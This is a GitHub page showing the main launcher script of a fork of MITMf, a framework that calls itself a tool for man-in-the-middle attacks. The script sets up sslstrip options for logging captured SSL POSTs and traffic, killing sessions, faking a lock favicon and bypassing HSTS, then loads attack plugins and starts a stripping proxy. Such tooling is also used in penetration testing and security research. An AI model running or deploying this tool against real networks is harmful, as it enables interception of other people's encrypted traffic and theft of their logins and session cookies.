forked from byt3bl33d3r/MITMf
-
Notifications
You must be signed in to change notification settings - Fork 0
/
mitmf.py
executable file
·124 lines (98 loc) · 5.06 KB
/
mitmf.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
#!/usr/bin/env python
from twisted.web import http
from twisted.internet import reactor
from libs.sslstrip.CookieCleaner import CookieCleaner
from libs.sergioproxy.ProxyPlugins import ProxyPlugins
import sys, logging, traceback, string, os
import argparse
try:
import user_agents
except:
sys.exit("[-] user_agents library not installed!")
try:
import configobj
except:
sys.exit("[-] configobj library not installed!")
from plugins import *
plugin_classes = plugin.Plugin.__subclasses__()
mitmf_version = "0.9"
sslstrip_version = "0.9"
sergio_version = "0.2.1"
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="MITMf v%s - Framework for MITM attacks" % mitmf_version, epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@')
#add sslstrip options
sgroup = parser.add_argument_group("sslstrip", "Options for sslstrip library")
#sgroup.add_argument("-w", "--write", type=argparse.FileType('w'), metavar="filename", default=sys.stdout, help="Specify file to log to (stdout by default).")
sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
slogopts = sgroup.add_mutually_exclusive_group()
slogopts.add_argument("-p", "--post", action="store_true",help="Log only SSL POSTs. (default)")
slogopts.add_argument("-s", "--ssl", action="store_true", help="Log all SSL traffic to and from server.")
slogopts.add_argument("-a", "--all", action="store_true", help="Log all SSL and HTTP traffic to and from server.")
#slogopts.add_argument("-c", "--clients", action='store_true', default=False, help='Log each clients data in a seperate file') #not fully tested yet
sgroup.add_argument("-i", "--interface", type=str, required=True, metavar="interface" ,help="Interface to listen on")
sgroup.add_argument("-l", "--listen", type=int, metavar="port", default=10000, help="Port to listen on (default 10000)")
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
sgroup.add_argument('-d', '--disable-proxy', dest='disproxy', action='store_true', default=False, help='Disable the SSLstrip Proxy')
sgroup.add_argument("-b", "--bypass-hsts", dest='hsts', action="store_true", default=False, help="Enable HSTS bypass")
#Initialize plugins
plugins = []
try:
for p in plugin_classes:
plugins.append(p())
except:
print "Failed to load plugin class %s" % str(p)
#Give subgroup to each plugin with options
try:
for p in plugins:
if p.desc == "":
sgroup = parser.add_argument_group("%s" % p.name,"Options for %s." % p.name)
else:
sgroup = parser.add_argument_group("%s" % p.name,p.desc)
sgroup.add_argument("--%s" % p.optname, action="store_true",help="Load plugin %s" % p.name)
if p.has_opts:
p.add_options(sgroup)
except NotImplementedError:
print "Plugin %s claimed option support, but didn't have it." % p.name
args = parser.parse_args()
log_level = logging.__dict__[args.log_level.upper()]
#Start logging
logging.basicConfig(level=log_level, format="%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
logFormatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
rootLogger = logging.getLogger()
fileHandler = logging.FileHandler("./logs/mitmf.log")
fileHandler.setFormatter(logFormatter)
rootLogger.addHandler(fileHandler)
#All our options should be loaded now, pass them onto plugins
print "[*] MITMf v%s started... initializing plugins and modules" % mitmf_version
if ('--responder' and '--wpad') in sys.argv:
args.listen = 3141
print "[*] Listening on port 3141 since --wpad was passed"
load = []
try:
for p in plugins:
if getattr(args, p.optname):
p.initialize(args)
load.append(p)
except NotImplementedError:
print "Plugin %s lacked initialize function." % p.name
#Plugins are ready to go, start MITMf
if args.disproxy:
ProxyPlugins.getInstance().setPlugins(load)
else:
from libs.sslstrip.StrippingProxy import StrippingProxy
from libs.sslstrip.URLMonitor import URLMonitor
URLMonitor.getInstance().setValues(args.favicon, args.hsts)
CookieCleaner.getInstance().setEnabled(args.killsessions)
ProxyPlugins.getInstance().setPlugins(load)
strippingFactory = http.HTTPFactory(timeout=10)
strippingFactory.protocol = StrippingProxy
reactor.listenTCP(args.listen, strippingFactory)
print "\n[*] sslstrip v%s by Moxie Marlinspike running..." % sslstrip_version
if args.hsts:
print "[*] sslstrip+ by Leonardo Nve running..."
print "[*] sergio-proxy v%s online" % sergio_version
reactor.run()
#cleanup on exit
for p in load:
p.finish()